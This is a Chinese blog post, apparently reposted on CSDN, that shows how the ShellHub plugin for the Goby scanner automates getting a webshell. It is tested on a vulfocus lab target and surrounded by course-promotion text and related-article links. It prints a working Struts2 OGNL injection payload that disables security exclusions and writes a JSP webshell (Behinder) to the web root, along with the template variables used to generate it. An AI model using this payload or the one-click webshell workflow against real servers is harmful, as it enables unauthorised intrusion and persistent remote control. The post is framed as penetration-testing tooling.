技术分享 上线利器 - ShellHub 插件初体验_echo md5(42291) unlink(_file_)(2)

最新推荐文章于 2024-07-01 14:54:48 发布
最新推荐文章于 2024-07-01 14:54:48 发布
阅读量697 收藏 10
点赞数 7
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84545364/article/details/138819730
版权

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


%{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT\_MEMBER\_ACCESS).(#_memberAccess?
(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).
(#req=(@org.apache.struts2.ServletActionContext@getRequest())).
(#path1=#req.getRealPath('/')).(#sb=(new java.lang.StringBuilder(#path1))).
(#path=#sb.append('/{{{name}}}')).(#shell='{{{file}}}').(#file=new java.io.File(#path)).(#fw=new java.io.FileWriter(#file)).(#fw.write(#shell)).
(#fw.flush()).(#fw.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).
(#ros.print('UPLO')).(#ros.println('AD-OK')).(#ros.flush())}

3.在 Payload 中实现一个功能:打印出 UPLOAD-OK 字符串,作为漏洞是否利用成功的依据。

4.在攻击测试页面中定义 3 个变量,其中前两个变量 name(为随机生成的 8 位冰蝎马前缀 +.jsp 后缀构成冰蝎马相对路径),file 变量表示写入的木马文件内容。payload用上面测试的即可,上述变量会被引用至 payload 中。

变量详情:

name|rand|str|8

//生成8位随机字符

name|name|concat|.jsp

//前面生成的字符加上后缀构成木马相对路径

file|genshell|exp|B:jsp

// file 代表变量名,可随意指定,该变量实际是一个数组,在http请求头中或请求体时,其值为一个形如<?php echo md5(随机值);unlink(\_\_FILE\_\_);?>; exp 代表上传一个 webshell;B:jsp 代表生成冰蝎的 jsp 马,同理还有 G:jspRaw 代表哥斯拉的 raw 类型的 jsp 马
在这里插入图片描述

5.设置漏洞利用成功标识-响应包中含有 UPLOAD-OK 字符串,设置 EXP 返回信息,包含:webshell 地址,webshell 连接密码,webshell 连接工具即可。

6.在 vulfocus.fofa.so 页面下快速启动一个用来测试的漏洞环境。
在这里插入图片描述
在这里插入图片描述

将存在漏洞的 url 导入,进行漏洞扫描和利用测试。

在这里插入图片描述

扫描验证成功后点击 webshell 即可一键获取 webshell。

在这里插入图片描述
在这里插入图片描述

0×03 插件亮点

1.该 Goby 插件在对同一种类型漏洞获取 webshell 的利用方式 PoC 进行定义后,即可实现发现漏洞后一键 webshell。整个过程行云流水,将发现漏洞 -> 文件上传写入木马 -> 连接 webshell 客户端一系列流程进行融合简化为一键式操作。将渗透测试获取 webshell 的流程在 Goby 一款工具上进行打通,大大提高了漏洞发现和利用的效率。

2.支持自定义各类获取 webshell 的 PoC, PoC 编写浅显易懂大部分 payload 取自手动测试时所用的 payload 并再此基础上进行修改最终实现想要的功能。例如在代码执行的漏洞中利用代码执行写入 jsp 木马文件,PoC 一次编写可供多次使用。

PoC 中检测漏洞利用是否成功的方式也很简单。例如判断响应包中是否存在唯一标识符等,也可以增加多个测试来保证漏洞的可靠性。笔者本次只校验了返回包中是否存在 UPLOAD-OK 字符串来判断漏洞是否利用成功。

在这里插入图片描述
在这里插入图片描述

3.支持多语言木马的上传。支持包括 JSPX、JSP、PHP、ASPX、ASP 冰蝎马的写入和一键实现获取 webshell, 语言覆盖面广。

4.目前该插件目前支持基本信息、文件管理、虚拟终端三大模块的 webShell 功能点,功能模块简洁明了。

在这里插入图片描述

在这里插入图片描述

0×04 插件不足

1.目前只支持冰蝎的木马,期待蚁剑、哥斯拉木马的支持。使得用户在木马的使用上多几种选择。

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84545364
关注
专栏目录
shellhubShellHub使团队可以轻松访问防火墙和NAT之后的任何Linux设备
02-03
用于边缘和云计算的集中式SSH。 ••• ShellHub是一种现代SSH服务器,用于通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备,它是sshd的替代产品。 将ShellHub视为用于边缘和云计算的集中式SSH。 可从获得ShellHub的托管版本。 入门 要开始使用ShellHub,建议您遵循ShellHub文档中的《指南》。 贡献 ShellHub是一个开源项目,我们希望收到社区的贡献。 如果您想贡献,请阅读我们的。 获得帮助 欢迎您在我们的提出任何问题,参与讨论并寻求帮助。 执照 ShellHub已获得Apache许可证2.0版的许可。 有关完整的许可证文本,请参阅 。 开发环境设置 首先,您需要为服务生成所需的密钥: $ ./bin/keygen 为开发设置环境: $ echo "SHELLHUB_ENV=development" >> .env.override 启动整个环境: $ ./bin/docker-compose up 避免直接使用docker-compose (除非您知道自己在做什么); 而是使用bin/docker-
Nu-Link_Keil_Driver_V3.01.6951.zip
01-03
新唐N76系列51单片机Keil SDK。 安装好Keil uVersion 4之后,再安装此软件,安装好之后,再打开Keil,添加器件的时候就会出现N76系列芯片的型号了。 此SDK装好之后,新唐的调试工具Nulink驱动也会同时安装上去,...
技术分享 | 上线利器 - ShellHub 插件初体验
m0_46699477的博客
12-09 2693
前言: 渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。 0×01 插件安装 ShellHub 已支持在 Goby 最新版插件扩展模块中一键下载安装。 下载完.
echo 字符进行md5加密
weixin_34128534的博客
11-25 724
echo字符串进行加密时,要加上“-n” 参数,意思是不输出换行符。 否则md5会同时将换行符加密。 echo -n abc | md5sum[root@localhost ~]# echo -n abc | md5sum 900150983cd24fb0d6963f7d28e17f72 - [root@localhost ~]# echo abc | md5su...
掌控边缘与云计算的集中式SSH管理平台:ShellHub
gitblog_00095的博客
05-14 312
掌控边缘与云计算的集中式SSH管理平台:ShellHub shellhub:computer: Get seamless remote access to any Linux device. Centralized SSH for the edge and cloud computing项目地址:https://gitcode.com/gh_mirrors/sh/shellhub ShellHu...
插件分享 | ShellHub 让 Goby 打通渗透流程
m0_46699477的博客
11-05 632
前言: 在渗透/HW 中成功拿下一个 webshell 无疑是让人十分激动的,一直以来,Goby 对于一些文件上传类漏洞的 Exp 的利用流程是去尝试获取一个 webshell,webshell 的种类在不受限的情况下默认上传冰蝎马,如果没有问题的话,会打印出 webshell 的 URL,密码,管理的工具,随后用户可以复制这些信息在对应的管理工具中进行连接。我们一直在想,能不能有更加优雅的方式完成上述的流程,就像 Goby 已有的反弹 shell 功能一样,点击一下open shell 按钮就能弹出打到.
ftp-server-code.rar_4 3 2 1_FTP SERVER_c 文件上传_ftp 上传
09-23
FTP(File Transfer Protocol)服务器是互联网上用于在不同计算机之间传输文件的标准协议。在这个"ftp-server-code.rar_4 3 2 1_FTP SERVER_c 文件上传_ftp 上传"项目中,我们可以看到一个用C语言编写的FTP服务器...
SD-FATFS.rar_SD_FATfs_stm32 SD_stm32 fatfs_stm32 fatfs sd_stm32
09-22
如果需要操作目录,可以使用`f_mkdir()`创建目录,`f_unlink()`删除文件或目录,`f_readdir()`遍历目录。 在实际应用中,需要处理各种异常情况,例如SD卡未插入、读写错误、文件不存在等。这需要通过检查返回的错误...
gr-0.52.0-Windows-x86_64.tar.gz
09-11
放到$DEPOT\packages\GR\BwGt2\deps\downloads 里面,然后修改$DEPOT\packages\GR\BwGt2\deps\build.jl ,删除 rm("downloads", force=true, recursive=true) 这一行, 然后再到julia中 Pkg.build("GR")。
DES_PC--k.rar_fprintf
09-23
if (pfile() == 0) unlink(inname) else fprintf(stderr, "%s: I/O Error -- File unchanged\n", inname) fclose(outfile) fclose(infile) } exit(0)
:computer:ShellHub使团队可以轻松访问防火墙和NAT之后的任何Linux设备。-Golang开发
05-26
ShellHub ShellHub是一种现代SSH服务器,用于通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备。 它旨在代替sshd使用。 ShellHub使团队可以轻松地为边缘和云计算使用集中式SSH。 ShellHub托管•文档•贡献•获得帮助ShellHub是现代SSH服务器,可通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备,它是sshd的替代方案。 将ShellHub视为用于边缘和云计算的集中式SSH。 可从https://shellhub.io/获得ShellHub的托管版本。 入门要开始使用ShellHub,建议您
shellhub 部署
最新发布
水彩橘子
07-01 300
创建完用户和命名空间登录,显示以下。操作系统:龙蜥os 7.9。
使用ShellHub搭建集中式SSH
恋上、小幸福的博客
06-25 870
ShellHub 是一个现代化的 SSH 服务器,可用于通过命令行(使用 SSH 客户端)或基于 Web 的用户界面远程访问 Linux 设备。通常,当您想通过 SSH 访问本地网络上的远程系统时,您需要知道系统的 IP 地址。但如果您想访问网络外部的系统,则需要进行一些配置,例如获取公共IP地址并根据需要配置路由器。如果设备位于限制 SSH 连接的公司防火墙后面,则更改 VPN/防火墙配置甚至会变得更加困难。ShellHub 通过让您轻松访问 NAT 或防火墙后面的任何 Linux 系统来消除这种困扰。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 996
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
技术分享 上线利器 - ShellHub 插件初体验_echo md5(42291) unlink(_file_)
2301_76224593的博客
04-29 219
渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。
MD5值看echo与printf的区别
weixin_34315189的博客
03-21 107
我们在写shell的时候常常会遇到显示MD5值的情况。 但是我们常常的使用echo显示命令,就会出现问题。下面举个例子: [root@Xiaoqiao ~]# echo abcd |md5sum f5ac8127b3b6b85cdc13f237c6005d80 - 如果使用printf就会是: [root@Xiaoqiao ~]# printf abcd |md5...
Json 编写 PoC&EXP 遇到的那些坑
Innocence_0的博客
08-10 290
.- 编写过程中还是遇到了很多问题,大部分算是解决了,当然一些需求还是需要用 go 写,希望能帮助还不会 go 语言的小伙伴们通过 json 去编写 PoC/EXP。文章来自Goby社区成员:HuaiNian,转载请注明出处。Params 不是当做输出信息来用的,而是为了给 EXP 传参用的。最后问了 Goby 的师傅说目前使用 json编写要想在 output 处实现这样的需求是不行的,想要实现的话只能使用 go 来编写了。
PHP md5()函数详解,PHP计算MD5md5()绕过,md5()漏洞原理剖析
m0_57540655的博客
04-18 1108
如果你在项目中遇到MD5「加密结果不一致」的问题,可以观察两个加密结果的长度是否相同,比如一个结果是16位,而另一个结果是32位,这种情况就可以考虑更换输出格式来解决。0e绕过还有一种变体:如果某个字符串的MD5值是0e开头的,在比较时,PHP也会先把它计算成 0,再参与比较。由于0和任何数相乘都等于0,所以0e开头的任何数,其MD5都是相同的。md5() 遇到「公式」,会先「运算」,再对运算结果「计算」MD5。0e是科学计数法,大小写等价,即 0e 和 0E 的结果相同。)时,可以使用 0e绕过。
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 6046
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。poc和exp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可
fs__WEBPACK_IMPORTED_MODULE_10___default.a.unlink is not a function
05-22
这个错误可能是因为您在尝试删除文件时使用了`fs.unlink`,但是`fs.unlink`的返回值是一个promise而不是一个函数。您需要使用`await fs.promises.unlink`来删除文件,或者使用回调函数来处理删除操作。另外,请确保...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值